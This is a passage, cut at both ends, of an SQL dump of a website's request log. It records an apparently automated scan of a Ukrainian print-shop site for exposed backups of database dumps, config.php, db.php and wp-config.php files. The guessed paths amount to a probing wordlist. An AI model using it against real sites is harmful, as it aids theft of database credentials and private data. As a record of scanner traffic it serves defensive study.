00:00:00',301),(10469,'http://ekvatorprint.com.ua/ekvatorprint_MySQL.sql',NULL,'','',2,0,'2017-08-16 17:17:34','0000-00-00 00:00:00',301),(10470,'http://ekvatorprint.com.ua/databases.sql',NULL,'','',2,0,'2017-08-16 17:17:35','0000-00-00 00:00:00',301),(10471,'http://ekvatorprint.com.ua/databases.zip',NULL,'','',2,0,'2017-08-16 17:17:36','0000-00-00 00:00:00',301),(10472,'http://ekvatorprint.com.ua/databases.tar',NULL,'','',2,0,'2017-08-16 17:17:36','0000-00-00 00:00:00',301),(10473,'http://ekvatorprint.com.ua/databases.tar.gz',NULL,'','',2,0,'2017-08-16 17:17:36','0000-00-00 00:00:00',301),(10474,'http://ekvatorprint.com.ua/databases.tgz',NULL,'','',2,0,'2017-08-16 17:17:36','0000-00-00 00:00:00',301),(10475,'http://ekvatorprint.com.ua/databases.bck',NULL,'','',2,0,'2017-08-16 17:17:36','0000-00-00 00:00:00',301),(10476,'http://ekvatorprint.com.ua/config.php.bck',NULL,'','',2,0,'2017-08-16 17:17:37','0000-00-00 00:00:00',301),(10477,'http://ekvatorprint.com.ua/connect.php.bak',NULL,'','',2,0,'2017-08-16 17:17:37','0000-00-00 00:00:00',301),(10478,'http://ekvatorprint.com.ua/connect.bck',NULL,'','',2,0,'2017-08-16 17:17:37','0000-00-00 00:00:00',301),(10479,'http://ekvatorprint.com.ua/connect.bak',NULL,'','',2,0,'2017-08-16 17:17:37','0000-00-00 00:00:00',301),(10480,'http://ekvatorprint.com.ua/connect.php~',NULL,'','',2,0,'2017-08-16 17:17:38','0000-00-00 00:00:00',301),(10481,'http://ekvatorprint.com.ua/db.php~',NULL,'','',2,0,'2017-08-16 17:17:38','0000-00-00 00:00:00',301),(10482,'http://ekvatorprint.com.ua/db.bak',NULL,'','',2,0,'2017-08-16 17:17:39','0000-00-00 00:00:00',301),(10483,'http://ekvatorprint.com.ua/db.php.bck',NULL,'','',2,0,'2017-08-16 17:17:39','0000-00-00 00:00:00',301),(10484,'http://ekvatorprint.com.ua/db.php.bak',NULL,'','',2,0,'2017-08-16 17:17:39','0000-00-00 00:00:00',301),(10485,'http://ekvatorprint.com.ua/database.php~',NULL,'','',2,0,'2017-08-16 17:17:39','0000-00-00 00:00:00',301),(10486,'http://ekvatorprint.com.ua/database.bak',NULL,'','',2,0,'2017-08-16 17:17:39','0000-00-00 00:00:00',301),(10487,'http://ekvatorprint.com.ua/database.php.bak',NULL,'','',2,0,'2017-08-16 17:17:39','0000-00-00 00:00:00',301),(10488,'http://ekvatorprint.com.ua/database.php.bck',NULL,'','',2,0,'2017-08-16 17:17:40','0000-00-00 00:00:00',301),(10489,'http://ekvatorprint.com.ua/inc/config.php~',NULL,'','',1,0,'2017-08-16 17:17:40','0000-00-00 00:00:00',301),(10490,'http://ekvatorprint.com.ua/inc/config.bak',NULL,'','',2,0,'2017-08-16 17:17:40','0000-00-00 00:00:00',301),(10491,'http://ekvatorprint.com.ua/inc/config.bck',NULL,'','',2,0,'2017-08-16 17:17:40','0000-00-00 00:00:00',301),(10492,'http://ekvatorprint.com.ua/inc/config.php.bak',NULL,'','',1,0,'2017-08-16 17:17:40','0000-00-00 00:00:00',301),(10493,'http://ekvatorprint.com.ua/inc/config.php.bck',NULL,'','',2,0,'2017-08-16 17:17:40','0000-00-00 00:00:00',301),(10494,'http://ekvatorprint.com.ua/inc/db.php~',NULL,'','',2,0,'2017-08-16 17:17:41','0000-00-00 00:00:00',301),(10495,'http://ekvatorprint.com.ua/inc/db.bck',NULL,'','',2,0,'2017-08-16 17:17:41','0000-00-00 00:00:00',301),(10496,'http://ekvatorprint.com.ua/inc/db.bak',NULL,'','',2,0,'2017-08-16 17:17:41','0000-00-00 00:00:00',301),(10497,'http://ekvatorprint.com.ua/inc/db.php.bak',NULL,'','',2,0,'2017-08-16 17:17:41','0000-00-00 00:00:00',301),(10498,'http://ekvatorprint.com.ua/inc/db.php.bck',NULL,'','',2,0,'2017-08-16 17:17:41','0000-00-00 00:00:00',301),(10499,'http://ekvatorprint.com.ua/inc/database.php~',NULL,'','',2,0,'2017-08-16 17:17:41','0000-00-00 00:00:00',301),(10500,'http://ekvatorprint.com.ua/inc/database.bak',NULL,'','',2,0,'2017-08-16 17:17:43','0000-00-00 00:00:00',301),(10501,'http://ekvatorprint.com.ua/inc/database.bck',NULL,'','',2,0,'2017-08-16 17:17:43','0000-00-00 00:00:00',301),(10502,'http://ekvatorprint.com.ua/inc/database.php.bak',NULL,'','',2,0,'2017-08-16 17:17:43','0000-00-00 00:00:00',301),(10503,'http://ekvatorprint.com.ua/inc/database.php.bck',NULL,'','',2,0,'2017-08-16 17:17:44','0000-00-00 00:00:00',301),(10504,'http://ekvatorprint.com.ua/inc/connect.php~',NULL,'','',2,0,'2017-08-16 17:17:44','0000-00-00 00:00:00',301),(10505,'http://ekvatorprint.com.ua/inc/connect.bak',NULL,'','',2,0,'2017-08-16 17:17:44','0000-00-00 00:00:00',301),(10506,'http://ekvatorprint.com.ua/inc/connect.bck',NULL,'','',2,0,'2017-08-16 17:17:44','0000-00-00 00:00:00',301),(10507,'http://ekvatorprint.com.ua/inc/connect.php.bak',NULL,'','',2,0,'2017-08-16 17:17:44','0000-00-00 00:00:00',301),(10508,'http://ekvatorprint.com.ua/inc/connect.php.bck',NULL,'','',2,0,'2017-08-16 17:17:45','0000-00-00 00:00:00',301),(10509,'http://ekvatorprint.com.ua/includes/db.php~',NULL,'','',2,0,'2017-08-16 17:17:45','0000-00-00 00:00:00',301),(10510,'http://ekvatorprint.com.ua/includes/db.bak',NULL,'','',2,0,'2017-08-16 17:17:45','0000-00-00 00:00:00',301),(10511,'http://ekvatorprint.com.ua/includes/db.bck',NULL,'','',2,0,'2017-08-16 17:17:46','0000-00-00 00:00:00',301),(10512,'http://ekvatorprint.com.ua/includes/db.php.bak',NULL,'','',2,0,'2017-08-16 17:17:46','0000-00-00 00:00:00',301),(10513,'http://ekvatorprint.com.ua/includes/db.php.bck',NULL,'','',2,0,'2017-08-16 17:17:46','0000-00-00 00:00:00',301),(10514,'http://ekvatorprint.com.ua/includes/database.php~',NULL,'','',2,0,'2017-08-16 17:17:47','0000-00-00 00:00:00',301),(10515,'http://ekvatorprint.com.ua/includes/database.bak',NULL,'','',2,0,'2017-08-16 17:17:47','0000-00-00 00:00:00',301),(10516,'http://ekvatorprint.com.ua/includes/database.bck',NULL,'','',2,0,'2017-08-16 17:17:47','0000-00-00 00:00:00',301),(10517,'http://ekvatorprint.com.ua/includes/database.php.bak',NULL,'','',2,0,'2017-08-16 17:17:47','0000-00-00 00:00:00',301),(10518,'http://ekvatorprint.com.ua/includes/database.php.bck',NULL,'','',2,0,'2017-08-16 17:17:47','0000-00-00 00:00:00',301),(10519,'http://ekvatorprint.com.ua/includes/connect.php~',NULL,'','',2,0,'2017-08-16 17:17:47','0000-00-00 00:00:00',301),(10520,'http://ekvatorprint.com.ua/includes/connect.bak',NULL,'','',2,0,'2017-08-16 17:17:48','0000-00-00 00:00:00',301),(10521,'http://ekvatorprint.com.ua/includes/connect.bck',NULL,'','',2,0,'2017-08-16 17:17:48','0000-00-00 00:00:00',301),(10522,'http://ekvatorprint.com.ua/includes/connect.php.bak',NULL,'','',2,0,'2017-08-16 17:17:48','0000-00-00 00:00:00',301),(10523,'http://ekvatorprint.com.ua/includes/connect.php.bck',NULL,'','',2,0,'2017-08-16 17:17:49','0000-00-00 00:00:00',301),(10524,'http://ekvatorprint.com.ua/includes/config.php.bak',NULL,'','',2,0,'2017-08-16 17:17:49','0000-00-00 00:00:00',301),(10525,'http://ekvatorprint.com.ua/includes/config.php.bck',NULL,'','',2,0,'2017-08-16 17:17:49','0000-00-00 00:00:00',301),(10526,'http://ekvatorprint.com.ua/includes/config.php~',NULL,'','',2,0,'2017-08-16 17:17:50','0000-00-00 00:00:00',301),(10527,'http://ekvatorprint.com.ua/includes/config.bak',NULL,'','',2,0,'2017-08-16 17:17:51','0000-00-00 00:00:00',301),(10528,'http://ekvatorprint.com.ua/includes/config.bck',NULL,'','',2,0,'2017-08-16 17:17:51','0000-00-00 00:00:00',301),(10529,'http://ekvatorprint.com.ua/include/connect.php~',NULL,'','',2,0,'2017-08-16 17:17:51','0000-00-00 00:00:00',301),(10530,'http://ekvatorprint.com.ua/include/connect.php.bak',NULL,'','',2,0,'2017-08-16 17:17:52','0000-00-00 00:00:00',301),(10531,'http://ekvatorprint.com.ua/include/connect.php.bck',NULL,'','',2,0,'2017-08-16 17:17:52','0000-00-00 00:00:00',301),(10532,'http://ekvatorprint.com.ua/include/db.php.bak',NULL,'','',2,0,'2017-08-16 17:17:53','0000-00-00 00:00:00',301),(10533,'http://ekvatorprint.com.ua/include/db.php.bck',NULL,'','',2,0,'2017-08-16 17:17:53','0000-00-00 00:00:00',301),(10534,'http://ekvatorprint.com.ua/include/db.php~',NULL,'','',2,0,'2017-08-16 17:17:53','0000-00-00 00:00:00',301),(10535,'http://ekvatorprint.com.ua/include/db.bak',NULL,'','',2,0,'2017-08-16 17:17:53','0000-00-00 00:00:00',301),(10536,'http://ekvatorprint.com.ua/include/db.bck',NULL,'','',2,0,'2017-08-16 17:17:53','0000-00-00 00:00:00',301),(10537,'http://ekvatorprint.com.ua/include/config.php~',NULL,'','',2,0,'2017-08-16 17:17:53','0000-00-00 00:00:00',301),(10538,'http://ekvatorprint.com.ua/include/config.bak',NULL,'','',2,0,'2017-08-16 17:17:54','0000-00-00 00:00:00',301),(10539,'http://ekvatorprint.com.ua/include/config.bck',NULL,'','',2,0,'2017-08-16 17:17:54','0000-00-00 00:00:00',301),(10540,'http://ekvatorprint.com.ua/include/config.php.bak',NULL,'','',2,0,'2017-08-16 17:17:55','0000-00-00 00:00:00',301),(10541,'http://ekvatorprint.com.ua/include/config.php.bck',NULL,'','',2,0,'2017-08-16 17:17:55','0000-00-00 00:00:00',301),(10542,'http://ekvatorprint.com.ua/config/db.php~',NULL,'','',2,0,'2017-08-16 17:17:55','0000-00-00 00:00:00',301),(10543,'http://ekvatorprint.com.ua/config/db.bak',NULL,'','',2,0,'2017-08-16 17:17:55','0000-00-00 00:00:00',301),(10544,'http://ekvatorprint.com.ua/config/db.bck',NULL,'','',2,0,'2017-08-16 17:17:55','0000-00-00 00:00:00',301),(10545,'http://ekvatorprint.com.ua/config/db.php.bak',NULL,'','',2,0,'2017-08-16 17:17:56','0000-00-00 00:00:00',301),(10546,'http://ekvatorprint.com.ua/config/db.php.bck',NULL,'','',2,0,'2017-08-16 17:17:56','0000-00-00 00:00:00',301),(10547,'http://ekvatorprint.com.ua/config/database.php~',NULL,'','',2,0,'2017-08-16 17:17:56','0000-00-00 00:00:00',301),(10548,'http://ekvatorprint.com.ua/config/database.bak',NULL,'','',2,0,'2017-08-16 17:17:57','0000-00-00 00:00:00',301),(10549,'http://ekvatorprint.com.ua/config/database.bck',NULL,'','',2,0,'2017-08-16 17:17:57','0000-00-00 00:00:00',301),(10550,'http://ekvatorprint.com.ua/config/database.php.bak',NULL,'','',2,0,'2017-08-16 17:17:57','0000-00-00 00:00:00',301),(10551,'http://ekvatorprint.com.ua/config/database.php.bck',NULL,'','',2,0,'2017-08-16 17:17:57','0000-00-00 00:00:00',301),(10552,'http://ekvatorprint.com.ua/config/connect.php~',NULL,'','',2,0,'2017-08-16 17:17:58','0000-00-00 00:00:00',301),(10553,'http://ekvatorprint.com.ua/config/connect.bak',NULL,'','',2,0,'2017-08-16 17:17:58','0000-00-00 00:00:00',301),(10554,'http://ekvatorprint.com.ua/config/connect.bck',NULL,'','',2,0,'2017-08-16 17:17:58','0000-00-00 00:00:00',301),(10555,'http://ekvatorprint.com.ua/config/connect.php.bak',NULL,'','',2,0,'2017-08-16 17:17:58','0000-00-00 00:00:00',301),(10556,'http://ekvatorprint.com.ua/config/connect.php.bck',NULL,'','',2,0,'2017-08-16 17:17:59','0000-00-00 00:00:00',301),(10557,'http://ekvatorprint.com.ua/config/config.php~',NULL,'','',2,0,'2017-08-16 17:17:59','0000-00-00 00:00:00',301),(10558,'http://ekvatorprint.com.ua/config/config.bak',NULL,'','',2,0,'2017-08-16 17:17:59','0000-00-00 00:00:00',301),(10559,'http://ekvatorprint.com.ua/config/config.bck',NULL,'','',2,0,'2017-08-16 17:17:59','0000-00-00 00:00:00',301),(10560,'http://ekvatorprint.com.ua/config/config.php.bak',NULL,'','',2,0,'2017-08-16 17:18:00','0000-00-00 00:00:00',301),(10561,'http://ekvatorprint.com.ua/config/config.php.bck',NULL,'','',2,0,'2017-08-16 17:18:00','0000-00-00 00:00:00',301),(10562,'http://ekvatorprint.com.ua/conf/db.php~',NULL,'','',2,0,'2017-08-16 17:18:00','0000-00-00 00:00:00',301),(10563,'http://ekvatorprint.com.ua/conf/db.bck',NULL,'','',2,0,'2017-08-16 17:18:00','0000-00-00 00:00:00',301),(10564,'http://ekvatorprint.com.ua/conf/db.bak',NULL,'','',2,0,'2017-08-16 17:18:01','0000-00-00 00:00:00',301),(10565,'http://ekvatorprint.com.ua/conf/db.php.bak',NULL,'','',2,0,'2017-08-16 17:18:01','0000-00-00 00:00:00',301),(10566,'http://ekvatorprint.com.ua/conf/db.php.bck',NULL,'','',2,0,'2017-08-16 17:18:01','0000-00-00 00:00:00',301),(10567,'http://ekvatorprint.com.ua/conf/database.php~',NULL,'','',2,0,'2017-08-16 17:18:01','0000-00-00 00:00:00',301),(10568,'http://ekvatorprint.com.ua/conf/database.bck',NULL,'','',2,0,'2017-08-16 17:18:01','0000-00-00 00:00:00',301),(10569,'http://ekvatorprint.com.ua/conf/database.bak',NULL,'','',2,0,'2017-08-16 17:18:01','0000-00-00 00:00:00',301),(10570,'http://ekvatorprint.com.ua/conf/database.php.bak',NULL,'','',2,0,'2017-08-16 17:18:01','0000-00-00 00:00:00',301),(10571,'http://ekvatorprint.com.ua/conf/database.php.bck',NULL,'','',2,0,'2017-08-16 17:18:02','0000-00-00 00:00:00',301),(10572,'http://ekvatorprint.com.ua/conf/connect.php~',NULL,'','',2,0,'2017-08-16 17:18:02','0000-00-00 00:00:00',301),(10573,'http://ekvatorprint.com.ua/conf/connect.bck',NULL,'','',2,0,'2017-08-16 17:18:02','0000-00-00 00:00:00',301),(10574,'http://ekvatorprint.com.ua/conf/connect.bak',NULL,'','',2,0,'2017-08-16 17:18:02','0000-00-00 00:00:00',301),(10575,'http://ekvatorprint.com.ua/conf/connect.php.bak',NULL,'','',2,0,'2017-08-16 17:18:02','0000-00-00 00:00:00',301),(10576,'http://ekvatorprint.com.ua/conf/connect.php.bck',NULL,'','',2,0,'2017-08-16 17:18:02','0000-00-00 00:00:00',301),(10577,'http://ekvatorprint.com.ua/conf/config.php~',NULL,'','',2,0,'2017-08-16 17:18:03','0000-00-00 00:00:00',301),(10578,'http://ekvatorprint.com.ua/conf/config.bck',NULL,'','',2,0,'2017-08-16 17:18:03','0000-00-00 00:00:00',301),(10579,'http://ekvatorprint.com.ua/conf/config.bak',NULL,'','',2,0,'2017-08-16 17:18:03','0000-00-00 00:00:00',301),(10580,'http://ekvatorprint.com.ua/conf/config.php.bak',NULL,'','',2,0,'2017-08-16 17:18:03','0000-00-00 00:00:00',301),(10581,'http://ekvatorprint.com.ua/conf/config.php.bck',NULL,'','',2,0,'2017-08-16 17:18:03','0000-00-00 00:00:00',301),(10582,'http://ekvatorprint.com.ua/db.gz',NULL,'','',2,0,'2017-08-16 17:18:03','0000-00-00 00:00:00',301),(10583,'http://ekvatorprint.com.ua/db.rar',NULL,'','',2,0,'2017-08-16 17:18:04','0000-00-00 00:00:00',301),(10584,'http://ekvatorprint.com.ua/db.bz2',NULL,'','',2,0,'2017-08-16 17:18:04','0000-00-00 00:00:00',301),(10585,'http://ekvatorprint.com.ua/db.tgz',NULL,'','',2,0,'2017-08-16 17:18:04','0000-00-00 00:00:00',301),(10586,'http://ekvatorprint.com.ua/db.bck',NULL,'','',2,0,'2017-08-16 17:18:04','0000-00-00 00:00:00',301),(10587,'http://ekvatorprint.com.ua/conf.gz',NULL,'','',2,0,'2017-08-16 17:18:04','0000-00-00 00:00:00',301),(10588,'http://ekvatorprint.com.ua/conf.rar',NULL,'','',2,0,'2017-08-16 17:18:05','0000-00-00 00:00:00',301),(10589,'http://ekvatorprint.com.ua/conf.zip',NULL,'','',2,0,'2017-08-16 17:18:05','0000-00-00 00:00:00',301),(10590,'http://ekvatorprint.com.ua/conf.tar.gz',NULL,'','',2,0,'2017-08-16 17:18:05','0000-00-00 00:00:00',301),(10591,'http://ekvatorprint.com.ua/conf.tar',NULL,'','',2,0,'2017-08-16 17:18:05','0000-00-00 00:00:00',301),(10592,'http://ekvatorprint.com.ua/conf.bz2',NULL,'','',2,0,'2017-08-16 17:18:06','0000-00-00 00:00:00',301),(10593,'http://ekvatorprint.com.ua/conf.tgz',NULL,'','',2,0,'2017-08-16 17:18:06','0000-00-00 00:00:00',301),(10594,'http://ekvatorprint.com.ua/conf.bck',NULL,'','',2,0,'2017-08-16 17:18:06','0000-00-00 00:00:00',301),(10595,'http://ekvatorprint.com.ua/config.gz',NULL,'','',2,0,'2017-08-16 17:18:07','0000-00-00 00:00:00',301),(10596,'http://ekvatorprint.com.ua/config.rar',NULL,'','',2,0,'2017-08-16 17:18:07','0000-00-00 00:00:00',301),(10597,'http://ekvatorprint.com.ua/config.zip',NULL,'','',2,0,'2017-08-16 17:18:07','0000-00-00 00:00:00',301),(10598,'http://ekvatorprint.com.ua/config.tar.gz',NULL,'','',2,0,'2017-08-16 17:18:07','0000-00-00 00:00:00',301),(10599,'http://ekvatorprint.com.ua/config.tar',NULL,'','',2,0,'2017-08-16 17:18:08','0000-00-00 00:00:00',301),(10600,'http://ekvatorprint.com.ua/config.bz2',NULL,'','',2,0,'2017-08-16 17:18:08','0000-00-00 00:00:00',301),(10601,'http://ekvatorprint.com.ua/config.tgz',NULL,'','',2,0,'2017-08-16 17:18:08','0000-00-00 00:00:00',301),(10602,'http://ekvatorprint.com.ua/config.bck',NULL,'','',2,0,'2017-08-16 17:18:08','0000-00-00 00:00:00',301),(10603,'http://ekvatorprint.com.ua/inc.gz',NULL,'','',2,0,'2017-08-16 17:18:08','0000-00-00 00:00:00',301),(10604,'http://ekvatorprint.com.ua/inc.rar',NULL,'','',2,0,'2017-08-16 17:18:09','0000-00-00 00:00:00',301),(10605,'http://ekvatorprint.com.ua/inc.zip',NULL,'','',2,0,'2017-08-16 17:18:09','0000-00-00 00:00:00',301),(10606,'http://ekvatorprint.com.ua/inc.tar.gz',NULL,'','',2,0,'2017-08-16 17:18:09','0000-00-00 00:00:00',301),(10607,'http://ekvatorprint.com.ua/inc.tar',NULL,'','',2,0,'2017-08-16 17:18:10','0000-00-00 00:00:00',301),(10608,'http://ekvatorprint.com.ua/inc.bz2',NULL,'','',2,0,'2017-08-16 17:18:10','0000-00-00 00:00:00',301),(10609,'http://ekvatorprint.com.ua/inc.tgz',NULL,'','',2,0,'2017-08-16 17:18:10','0000-00-00 00:00:00',301),(10610,'http://ekvatorprint.com.ua/inc.bck',NULL,'','',2,0,'2017-08-16 17:18:10','0000-00-00 00:00:00',301),(10611,'http://ekvatorprint.com.ua/include.gz',NULL,'','',2,0,'2017-08-16 17:18:10','0000-00-00 00:00:00',301),(10612,'http://ekvatorprint.com.ua/include.rar',NULL,'','',2,0,'2017-08-16 17:18:14','0000-00-00 00:00:00',301),(10613,'http://ekvatorprint.com.ua/include.zip',NULL,'','',2,0,'2017-08-16 17:18:14','0000-00-00 00:00:00',301),(10614,'http://ekvatorprint.com.ua/include.tar.gz',NULL,'','',2,0,'2017-08-16 17:18:15','0000-00-00 00:00:00',301),(10615,'http://ekvatorprint.com.ua/include.tar',NULL,'','',2,0,'2017-08-16 17:18:15','0000-00-00 00:00:00',301),(10616,'http://ekvatorprint.com.ua/include.bz2',NULL,'','',2,0,'2017-08-16 17:18:15','0000-00-00 00:00:00',301),(10617,'http://ekvatorprint.com.ua/include.tgz',NULL,'','',2,0,'2017-08-16 17:18:15','0000-00-00 00:00:00',301),(10618,'http://ekvatorprint.com.ua/include.bck',NULL,'','',2,0,'2017-08-16 17:18:15','0000-00-00 00:00:00',301),(10619,'http://ekvatorprint.com.ua/includes.gz',NULL,'','',2,0,'2017-08-16 17:18:16','0000-00-00 00:00:00',301),(10620,'http://ekvatorprint.com.ua/includes.rar',NULL,'','',2,0,'2017-08-16 17:18:16','0000-00-00 00:00:00',301),(10621,'http://ekvatorprint.com.ua/includes.zip',NULL,'','',2,0,'2017-08-16 17:18:16','0000-00-00 00:00:00',301),(10622,'http://ekvatorprint.com.ua/includes.tar.gz',NULL,'','',2,0,'2017-08-16 17:18:17','0000-00-00 00:00:00',301),(10623,'http://ekvatorprint.com.ua/includes.tar',NULL,'','',2,0,'2017-08-16 17:18:17','0000-00-00 00:00:00',301),(10624,'http://ekvatorprint.com.ua/includes.bz2',NULL,'','',2,0,'2017-08-16 17:18:17','0000-00-00 00:00:00',301),(10625,'http://ekvatorprint.com.ua/includes.tgz',NULL,'','',2,0,'2017-08-16 17:18:18','0000-00-00 00:00:00',301),(10626,'http://ekvatorprint.com.ua/includes.bck',NULL,'','',2,0,'2017-08-16 17:18:18','0000-00-00 00:00:00',301),(10627,'http://ekvatorprint.com.ua/database.gz',NULL,'','',2,0,'2017-08-16 17:18:18','0000-00-00 00:00:00',301),(10628,'http://ekvatorprint.com.ua/database.bz2',NULL,'','',2,0,'2017-08-16 17:18:18','0000-00-00 00:00:00',301),(10629,'http://ekvatorprint.com.ua/database.tgz',NULL,'','',2,0,'2017-08-16 17:18:19','0000-00-00 00:00:00',301),(10630,'http://ekvatorprint.com.ua/database.bck',NULL,'','',2,0,'2017-08-16 17:18:19','0000-00-00 00:00:00',301),(10631,'http://ekvatorprint.com.ua/wp/wp-config.php~',NULL,'','',2,0,'2017-08-16 17:18:19','0000-00-00 00:00:00',301),(10632,'http://ekvatorprint.com.ua/wp/wp-config.bak',NULL,'','',2,0,'2017-08-16 17:18:20','0000-00-00 00:00:00',301),(10633,'http://ekvatorprint.com.ua/wp/wp-config.bck',NULL,'','',2,0,'2017-08-16 17:18:20','0000-00-00 00:00:00',301),(10634,'http://ekvatorprint.com.ua/wp/wp-config.php.bak',NULL,'','',2,0,'2017-08-16 17:18:20','0000-00-00 00:00:00',301),(10635,'http://ekvatorprint.com.ua/wp/wp-config.php.bck',NULL,'','',2,0,'2017-08-16 17:18:20','0000-00-00 00:00:00',301),(10636,'http://ekvatorprint.com.ua/blog/wp-config.php~',NULL,'','',2,0,'2017-08-16 17:18:20','0000-00-00 00:00:00',301),(10637,'http://ekvatorprint.com.ua/blog/wp-config.php.bak',NULL,'','',2,0,'2017-08-16 17:18:21','0000-00-00 00:00:00',301),(10638,'http://ekvatorprint.com.ua/wordpress/wp-config.php~',NULL,'','',2,0,'2017-08-16 17:18:21','0000-00-00 00:00:00',301),(10639,'http://ekvatorprint.com.ua/wordpress/wp-config.php.bak',NULL,'','',2,0,'2017-08-16 17:18:23','0000-00-00 00:00:00',301),(10640,'http://ekvatorprint.com.ua/localhostdb.sql',NULL,'','',1,0,'2017-08-16 17:18:25','0000-00-00 00:00:00',301),(10641,'http://ekvatorprint.com.ua/localhost_db.sql',NULL,'','',1,0,'2017-08-16 17:18:25','0000-00-00 00:00:00',301),(10642,'http://ekvatorprint.com.ua/localhost-db.sql',NULL,'','',1,0,'2017-08-16 17:18:25','0000-00-00 00:00:00',301),(10643,'http://ekvatorprint.com.ua/localhost_database.sql',NULL,'','',1,0,'2017-08-16 17:18:25','0000-00-00 00:00:00',301),(10644,'http://ekvatorprint.com.ua/localhost-database.sql',NULL,'','',1,0,'2017-08-16 17:18:25','0000-00-00 00:00:00',301),(10645,'http://ekvatorprint.com.ua/localhost_dump.sql',NULL,'','',1,0,'2017-08-16 17:18:26','0000-00-00 00:00:00',301),(10646,'http://ekvatorprint.com.ua/localhost-dump.sql',NULL,'','',1,0,'2017-08-16 17:18:26','0000-00-00 00:00:00',301),(10647,'http://ekvatorprint.com.ua/localhostbackup.sql',NULL,'','',1,0,'2017-08-16 17:18:26','0000-00-00 00:00:00',301),(10648,'http://ekvatorprint.com.ua/localhost_backup.sql',NULL,'','',1,0,'2017-08-16 17:18:26','0000-00-00 00:00:00',301),(10649,'http://ekvatorprint.com.ua/localhost-backup.sql',NULL,'','',1,0,'2017-08-16 17:18:27','0000-00-00 00:00:00',301),(10650,'http://ekvatorprint.com.ua/backuplocalhost.sql',NULL,'','',1,0,'2017-08-16 17:18:27','0000-00-00 00:00:00',301),(10651,'http://ekvatorprint.com.ua/backup-localhost.sql',NULL,'','',1,0,'2017-08-16 17:18:27','0000-00-00 00:00:00',301),(10652,'http://ekvatorprint.com.ua/backup_localhost.sql',NULL,'','',1,0,'2017-08-16 17:18:28','0000-00-00 00:00:00',301),(10653,'http://ekvatorprint.com.ua/ekvatorprintdb.sql',NULL,'','',1,0,'2017-08-16 17:18:28','0000-00-00 00:00:00',301),(10654,'http://ekvatorprint.com.ua/ekvatorprint_db.sql',NULL,'','',2,0,'2017-08-16 17:18:28','0000-00-00 00:00:00',301),(10655,'http://ekvatorprint.com.ua/ekvatorprint-db.sql',NULL,'','',1,0,'2017-08-16 17:18:28','0000-00-00 00:00:00',301),(10656,'http://ekvatorprint.com.ua/ekvatorprint_database.sql',NULL,'','',1,0,'2017-08-16 17:18:28','0000-00-00 00:00:00',301),(10657,'http://ekvatorprint.com.ua/ekvatorprint-database.sql',NULL,'','',1,0,'2017-08-16 17:18:28','0000-00-00 00:00:00',301),(10658,'http://ekvatorprint.com.ua/ekvatorprint_dump.sql',NULL,'','',1,0,'2017-08-16 17:18:29','0000-00-00 00:00:00',301),(10659,'http://ekvatorprint.com.ua/ekvatorprint-dump.sql',NULL,'','',1,0,'2017-08-16 17:18:29','0000-00-00 00:00:00',301),(10660,'http://ekvatorprint.com.ua/ekvatorprintbackup.sql',NULL,'','',1,0,'2017-08-16 17:18:29','0000-00-00 00:00:00',301),(10661,'http://ekvatorprint.com.ua/ekvatorprint-backup.sql',NULL,'','',1,0,'2017-08-16 17:18:29','0000-00-00 00:00:00',301),(10662,'http://ekvatorprint.com.ua/backupekvatorprint.sql',NULL,'','',1,0,'2017-08-16 17:18:29','0000-00-00 00:00:00',301),(10663,'http://ekvatorprint.com.ua/backup-ekvatorprint.sql',NULL,'','',1,0,'2017-08-16 17:18:30','0000-00-00 00:00:00',301),(10664,'http://ekvatorprint.com.ua/backup_ekvatorprint.sql',NULL,'','',1,0,'2017-08-16 17:18:31','0000-00-00 00:00:00',301),(10665,'http://ekvatorprint.com.ua/ekvatorprint.com.uadb.sql',NULL,'','',1,0,'2017-08-16 17:18:31','0000-00-00 00:00:00',301),(10666,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_db.sql',NULL,'','',1,0,'2017-08-16 17:18:32','0000-00-00 00:00:00',301),(10667,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-db.sql',NULL,'','',1,0,'2017-08-16 17:18:32','0000-00-00 00:00:00',301),(10668,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_database.sql',NULL,'','',1,0,'2017-08-16 17:18:32','0000-00-00 00:00:00',301),(10669,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-database.sql',NULL,'','',1,0,'2017-08-16 17:18:33','0000-00-00 00:00:00',301),(10670,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_dump.sql',NULL,'','',1,0,'2017-08-16 17:18:33','0000-00-00 00:00:00',301),(10671,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-dump.sql',NULL,'','',1,0,'2017-08-16 17:18:33','0000-00-00 00:00:00',301),(10672,'http://ekvatorprint.com.ua/ekvatorprint.com.uabackup.sql',NULL,'','',1,0,'2017-08-16 17:18:33','0000-00-00 00:00:00',301),(10673,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_backup.sql',NULL,'','',1,0,'2017-08-16 17:18:33','0000-00-00 00:00:00',301),(10674,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-backup.sql',NULL,'','',1,0,'2017-08-16 17:18:34','0000-00-00 00:00:00',301),(10675,'http://ekvatorprint.com.ua/backupekvatorprint.com.ua.sql',NULL,'','',1,0,'2017-08-16 17:18:34','0000-00-00 00:00:00',301),(10676,'http://ekvatorprint.com.ua/backup-ekvatorprint.com.ua.sql',NULL,'','',1,0,'2017-08-16 17:18:34','0000-00-00 00:00:00',301),(10677,'http://ekvatorprint.com.ua/backup_ekvatorprint.com.ua.sql',NULL,'','',1,0,'2017-08-16 17:18:34','0000-00-00 00:00:00',301),(10678,'http://ekvatorprint.com.ua/database.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:35','0000-00-00 00:00:00',301),(10679,'http://ekvatorprint.com.ua/localhost.sql.gz',NULL,'','',2,0,'2017-08-16 17:18:35','0000-00-00 00:00:00',301),(10680,'http://ekvatorprint.com.ua/localhostdb.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:35','0000-00-00 00:00:00',301),(10681,'http://ekvatorprint.com.ua/localhost_db.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:35','0000-00-00 00:00:00',301),(10682,'http://ekvatorprint.com.ua/localhost-db.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:36','0000-00-00 00:00:00',301),(10683,'http://ekvatorprint.com.ua/localhost_database.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:36','0000-00-00 00:00:00',301),(10684,'http://ekvatorprint.com.ua/localhost-database.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:36','0000-00-00 00:00:00',301),(10685,'http://ekvatorprint.com.ua/localhost_dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:36','0000-00-00 